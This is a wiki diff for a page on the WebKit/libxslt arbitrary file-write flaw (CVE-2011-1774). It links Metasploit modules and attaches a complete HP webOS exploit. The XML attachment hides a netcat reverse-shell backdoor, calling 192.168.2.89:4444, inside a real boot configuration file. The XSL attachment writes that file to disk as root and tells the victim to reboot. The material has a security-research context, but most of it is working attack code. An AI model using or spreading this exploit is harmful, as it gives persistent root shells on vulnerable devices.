Changes for page Application_Webkit

Summary

• Page properties (1 modified, 0 added, 0 removed)
• Attachments (0 modified, 2 added, 0 removed)
  • webos-root-backdoor.xml
  • webos-root-backdoor.xsl

Details

Page properties

Content

...	...	@@ -26,4 +26,16 @@
26	26	Webkit uses [[libxslt>>Engine_libxslt]] as its XSLT engine. Old versions were not restricting __write__ access by the engine to the file system, leading to a remotely exploitable vulnerability ([[CVE-2011-1774>>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1774||rel="__blank"]]). This was patched in [[Changeset 79159>>http://trac.webkit.org/changeset/79159||rel="__blank"]] by adding appropriate calls to xsltSetSecurityPrefs().
27	27
28	28
29		-PoC included on the [[libxslt>>Engine_libxslt]] page are enough to demonstrate the vulnerability. A auxiliary plugin is available in Metasploit
	29	+PoC included on the [[libxslt>>Engine_libxslt]] page demonstrate the vulnerability.
	30	+
	31	+== Exploits ==
	32	+
	33	+Two modules are included in Metasploit :
	34	+
	35	+* a [[auxiliary>>http://www.metasploit.com/modules/auxiliary/server/webkit_xslt_dropper||rel="__blank"]] working on any non-sandboxed non-patched Webkit device
	36	+* an [[exploit>>http://www.metasploit.com/modules/exploit/windows/browser/safari_xslt_output||rel="__blank"]] plugin targeting Safari users with Admin privileges (because of the MOF trick)
	37	+
	38	+An exploit for HP webOS is attached. This exploit drops a backdoor executed with root privileges at boot time :
	39	+
	40	+* XML contains the payload : destination file name + file content. A reverse-shell based on netcat is added to the script
	41	+* XSL reads the XML file and create the requested file on disk

webos-root-backdoor.xml

Author

...	...	@@ -1,0 +1,1 @@
	1	+xwiki:XWiki.NicolasGregoire

Size

...	...	@@ -1,0 +1,1 @@
	1	+1.7 KB

Content

...	...	@@ -1,0 +1,54 @@
	1	+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
	2	+<?xml-stylesheet type="text/xsl" href="xslt2root.xsl"?>
	3	+<exploit><location>/etc/default/mount_checks</location><content><![CDATA[# -*- mode: conf; -*-
	4	+
	5	+# Backdoor, by Nicolas Gregoire / Agarri
	6	+IP="192.168.2.89"
	7	+PORT="4444"
	8	+
	9	+MKNOD="/bin/mknod"
	10	+NC="/usr/bin/nc"
	11	+FIFO="/tmp/.a"
	12	+
	13	+( $MKNOD $FIFO p; while true; do { sleep 1; $NC $IP $PORT < $FIFO | /bin/sh &> $FIFO ; } done ; rm $FIFO ) &
	14	+# End backdoor
	15	+
	16	+
	17	+# Set this to save a file across reboots to indictate on boot that
	18	+# umount happened correctly (and that, e.g. battery wasn't pulled)
	19	+MOUNT_STAMP=/var/umount.stamp
	20	+# tags used in MOUNT_STAMP
	21	+REASON_MARK=reason
	22	+CLEAN_UMOUNT_MARK=date
	23	+
	24	+# name of system property holding true/false based on presence of
	25	+# $MOUNT_STAMP. Ignored if MOUNT_STAMP not set; must be defined
	26	+# otherwise
	27	+MOUNT_PROPERTY=last_umount_clean
	28	+
	29	+# file that contains 1 if / should be remounted rw, 0 otherwise
	30	+REMOUNT_TOKEN="/etc/.rootfs_RW"
	31	+
	32	+# If an fsck or reformat of /media/internal was required on boot, set
	33	+# this property.
	34	+MEDIA_FIX_PROPERTY=media_fixed_how
	35	+
	36	+WIPE_FLAGS_DIR=/var/.flags
	37	+WIPE_FLAGS_FILE=$WIPE_FLAGS_DIR/on_mount
	38	+WIPE_PROGRESS=/var/.sought_blocks
	39	+
	40	+# MMC_PROTECT_OPTS=-f
	41	+MMC_PROTECT_OPTS=""
	42	+MMC_PROTECT_DISABLED=1
	43	+mmc_boot_update() {
	44	+ if which mmc_protect >/dev/null && test -z "$MMC_PROTECT_DISABLED" ; then
	45	+ BOOT_DEV=$(sed 's,.*root=\(/dev/[^ ]*\) .*,\1,' < /proc/cmdline)
	46	+ ON_OFF=1 # on by default
	47	+ if [ -f "$REMOUNT_TOKEN" -a "$(cat $REMOUNT_TOKEN)" = "1" ]; then
	48	+ ON_OFF=0
	49	+ fi
	50	+ mmc_protect $MMC_PROTECT_OPTS -D "$BOOT_DEV" -p $ON_OFF
	51	+ fi
	52	+}
	53	+]]></content></exploit>
	54	+

webos-root-backdoor.xsl

Author

...	...	@@ -1,0 +1,1 @@
	1	+xwiki:XWiki.NicolasGregoire

Size

...	...	@@ -1,0 +1,1 @@
	1	+816 bytes

Content

...	...	@@ -1,0 +1,17 @@
	1	+<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
	2	+ <!-- Of course, the webOS browser runs as 'root' ;-) -->
	3	+ <xsl:template match="/">
	4	+ <!-- Grab some values from the XML file -->
	5	+ <xsl:variable name="content" select="//content/text()"/>
	6	+ <xsl:variable name="location" select="//location/text()"/>
	7	+ <html><body>
	8	+ <!-- Drop the backdoor, overwriting the previous configuration file -->
	9	+ <xsl:document href="{$location}" method="text"><xsl:copy-of select="$content"/></xsl:document>
	10	+ <!-- Display something to the user -->
	11	+ File '<xsl:copy-of select="$location"/>' has been overwritten ...<br/>
	12	+ <!-- Ask for a reboot. We could force it too ... -->
	13	+ Now reboot and wait for your reverse-shell ;-)<br/>
	14	+ </body></html>
	15	+ </xsl:template>
	16	+</xsl:stylesheet>
	17	+